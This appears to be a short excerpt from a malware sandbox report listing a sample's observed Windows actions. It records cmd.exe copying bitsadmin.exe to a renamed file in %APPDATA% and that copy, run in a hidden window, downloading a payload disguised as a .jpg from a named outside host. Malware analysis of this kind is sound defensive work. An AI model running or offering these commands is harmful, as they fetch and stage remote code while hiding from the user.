Technical Information
- '%APPDATA%\twsr.exe' /transfer fEfujI /download https://zoomovers.com/momo/01808660151.jpg %APPDATA%\018086601514
- %APPDATA%\twsr.exe
- 'zo###vers.com':443
- DNS ASK zo###vers.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\twsR.exe' (with hidden window)
- '%APPDATA%\twsr.exe' /transfer fEfujI /download https://zoomovers.com/momo/01808660151.jpg %APPDATA%\018086601514' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\twsR.exe